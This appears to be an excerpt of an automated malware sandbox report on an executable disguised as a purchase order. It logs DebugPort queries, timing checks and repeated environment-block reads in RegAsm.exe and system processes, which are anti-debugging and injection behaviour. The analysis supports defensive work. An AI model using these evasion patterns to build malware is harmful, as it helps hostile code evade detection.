Source: C:\Users\user\Desktop\PURCHASED ORDER OF ENG091.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\chkdsk.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_00409AB0 rdtsc

7_2_00409AB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 7_2_0040ACF0 LdrLoadDll,

7_2_0040ACF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0342634F mov eax, dword ptr fs:[00000030h]	7_2_0342634F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341A352 mov eax, dword ptr fs:[00000030h]	7_2_0341A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334C310 mov ecx, dword ptr fs:[00000030h]	7_2_0334C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03370310 mov ecx, dword ptr fs:[00000030h]	7_2_03370310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A30B mov eax, dword ptr fs:[00000030h]	7_2_0338A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A30B mov eax, dword ptr fs:[00000030h]	7_2_0338A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A30B mov eax, dword ptr fs:[00000030h]	7_2_0338A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F437C mov eax, dword ptr fs:[00000030h]	7_2_033F437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D035C mov eax, dword ptr fs:[00000030h]	7_2_033D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D035C mov eax, dword ptr fs:[00000030h]	7_2_033D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D035C mov eax, dword ptr fs:[00000030h]	7_2_033D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D035C mov ecx, dword ptr fs:[00000030h]	7_2_033D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D035C mov eax, dword ptr fs:[00000030h]	7_2_033D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D035C mov eax, dword ptr fs:[00000030h]	7_2_033D035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F8350 mov ecx, dword ptr fs:[00000030h]	7_2_033F8350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D2349 mov eax, dword ptr fs:[00000030h]	7_2_033D2349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340C3CD mov eax, dword ptr fs:[00000030h]	7_2_0340C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03348397 mov eax, dword ptr fs:[00000030h]	7_2_03348397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03348397 mov eax, dword ptr fs:[00000030h]	7_2_03348397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03348397 mov eax, dword ptr fs:[00000030h]	7_2_03348397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337438F mov eax, dword ptr fs:[00000030h]	7_2_0337438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337438F mov eax, dword ptr fs:[00000030h]	7_2_0337438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334E388 mov eax, dword ptr fs:[00000030h]	7_2_0334E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334E388 mov eax, dword ptr fs:[00000030h]	7_2_0334E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334E388 mov eax, dword ptr fs:[00000030h]	7_2_0334E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0336E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0336E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E3F0 mov eax, dword ptr fs:[00000030h]	7_2_0336E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033863FF mov eax, dword ptr fs:[00000030h]	7_2_033863FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033603E9 mov eax, dword ptr fs:[00000030h]	7_2_033603E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE3DB mov eax, dword ptr fs:[00000030h]	7_2_033FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE3DB mov eax, dword ptr fs:[00000030h]	7_2_033FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE3DB mov ecx, dword ptr fs:[00000030h]	7_2_033FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE3DB mov eax, dword ptr fs:[00000030h]	7_2_033FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F43D4 mov eax, dword ptr fs:[00000030h]	7_2_033F43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F43D4 mov eax, dword ptr fs:[00000030h]	7_2_033F43D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0335A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0335A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0335A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0335A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0335A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A3C0 mov eax, dword ptr fs:[00000030h]	7_2_0335A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033583C0 mov eax, dword ptr fs:[00000030h]	7_2_033583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033583C0 mov eax, dword ptr fs:[00000030h]	7_2_033583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033583C0 mov eax, dword ptr fs:[00000030h]	7_2_033583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033583C0 mov eax, dword ptr fs:[00000030h]	7_2_033583C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D63C0 mov eax, dword ptr fs:[00000030h]	7_2_033D63C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334823B mov eax, dword ptr fs:[00000030h]	7_2_0334823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340A250 mov eax, dword ptr fs:[00000030h]	7_2_0340A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340A250 mov eax, dword ptr fs:[00000030h]	7_2_0340A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0342625D mov eax, dword ptr fs:[00000030h]	7_2_0342625D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03400274 mov eax, dword ptr fs:[00000030h]	7_2_03400274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354260 mov eax, dword ptr fs:[00000030h]	7_2_03354260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354260 mov eax, dword ptr fs:[00000030h]	7_2_03354260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354260 mov eax, dword ptr fs:[00000030h]	7_2_03354260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334826B mov eax, dword ptr fs:[00000030h]	7_2_0334826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334A250 mov eax, dword ptr fs:[00000030h]	7_2_0334A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356259 mov eax, dword ptr fs:[00000030h]	7_2_03356259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D8243 mov eax, dword ptr fs:[00000030h]	7_2_033D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D8243 mov ecx, dword ptr fs:[00000030h]	7_2_033D8243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034262D6 mov eax, dword ptr fs:[00000030h]	7_2_034262D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E62A0 mov eax, dword ptr fs:[00000030h]	7_2_033E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E62A0 mov ecx, dword ptr fs:[00000030h]	7_2_033E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E62A0 mov eax, dword ptr fs:[00000030h]	7_2_033E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E62A0 mov eax, dword ptr fs:[00000030h]	7_2_033E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E62A0 mov eax, dword ptr fs:[00000030h]	7_2_033E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E62A0 mov eax, dword ptr fs:[00000030h]	7_2_033E62A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E284 mov eax, dword ptr fs:[00000030h]	7_2_0338E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E284 mov eax, dword ptr fs:[00000030h]	7_2_0338E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D0283 mov eax, dword ptr fs:[00000030h]	7_2_033D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D0283 mov eax, dword ptr fs:[00000030h]	7_2_033D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D0283 mov eax, dword ptr fs:[00000030h]	7_2_033D0283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033602E1 mov eax, dword ptr fs:[00000030h]	7_2_033602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033602E1 mov eax, dword ptr fs:[00000030h]	7_2_033602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033602E1 mov eax, dword ptr fs:[00000030h]	7_2_033602E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0335A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0335A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0335A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0335A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335A2C3 mov eax, dword ptr fs:[00000030h]	7_2_0335A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03380124 mov eax, dword ptr fs:[00000030h]	7_2_03380124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424164 mov eax, dword ptr fs:[00000030h]	7_2_03424164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424164 mov eax, dword ptr fs:[00000030h]	7_2_03424164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FA118 mov ecx, dword ptr fs:[00000030h]	7_2_033FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FA118 mov eax, dword ptr fs:[00000030h]	7_2_033FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FA118 mov eax, dword ptr fs:[00000030h]	7_2_033FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FA118 mov eax, dword ptr fs:[00000030h]	7_2_033FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov eax, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov ecx, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov eax, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov eax, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov ecx, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov eax, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov eax, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov ecx, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov eax, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033FE10E mov ecx, dword ptr fs:[00000030h]	7_2_033FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03410115 mov eax, dword ptr fs:[00000030h]	7_2_03410115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356154 mov eax, dword ptr fs:[00000030h]	7_2_03356154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03356154 mov eax, dword ptr fs:[00000030h]	7_2_03356154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334C156 mov eax, dword ptr fs:[00000030h]	7_2_0334C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E8158 mov eax, dword ptr fs:[00000030h]	7_2_033E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E4144 mov eax, dword ptr fs:[00000030h]	7_2_033E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E4144 mov eax, dword ptr fs:[00000030h]	7_2_033E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E4144 mov ecx, dword ptr fs:[00000030h]	7_2_033E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E4144 mov eax, dword ptr fs:[00000030h]	7_2_033E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E4144 mov eax, dword ptr fs:[00000030h]	7_2_033E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034161C3 mov eax, dword ptr fs:[00000030h]	7_2_034161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034161C3 mov eax, dword ptr fs:[00000030h]	7_2_034161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D019F mov eax, dword ptr fs:[00000030h]	7_2_033D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D019F mov eax, dword ptr fs:[00000030h]	7_2_033D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D019F mov eax, dword ptr fs:[00000030h]	7_2_033D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D019F mov eax, dword ptr fs:[00000030h]	7_2_033D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334A197 mov eax, dword ptr fs:[00000030h]	7_2_0334A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334A197 mov eax, dword ptr fs:[00000030h]	7_2_0334A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334A197 mov eax, dword ptr fs:[00000030h]	7_2_0334A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034261E5 mov eax, dword ptr fs:[00000030h]	7_2_034261E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03390185 mov eax, dword ptr fs:[00000030h]	7_2_03390185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F4180 mov eax, dword ptr fs:[00000030h]	7_2_033F4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F4180 mov eax, dword ptr fs:[00000030h]	7_2_033F4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033801F8 mov eax, dword ptr fs:[00000030h]	7_2_033801F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340C188 mov eax, dword ptr fs:[00000030h]	7_2_0340C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340C188 mov eax, dword ptr fs:[00000030h]	7_2_0340C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE1D0 mov eax, dword ptr fs:[00000030h]	7_2_033CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE1D0 mov eax, dword ptr fs:[00000030h]	7_2_033CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE1D0 mov ecx, dword ptr fs:[00000030h]	7_2_033CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE1D0 mov eax, dword ptr fs:[00000030h]	7_2_033CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE1D0 mov eax, dword ptr fs:[00000030h]	7_2_033CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E6030 mov eax, dword ptr fs:[00000030h]	7_2_033E6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334A020 mov eax, dword ptr fs:[00000030h]	7_2_0334A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334C020 mov eax, dword ptr fs:[00000030h]	7_2_0334C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E016 mov eax, dword ptr fs:[00000030h]	7_2_0336E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E016 mov eax, dword ptr fs:[00000030h]	7_2_0336E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E016 mov eax, dword ptr fs:[00000030h]	7_2_0336E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E016 mov eax, dword ptr fs:[00000030h]	7_2_0336E016
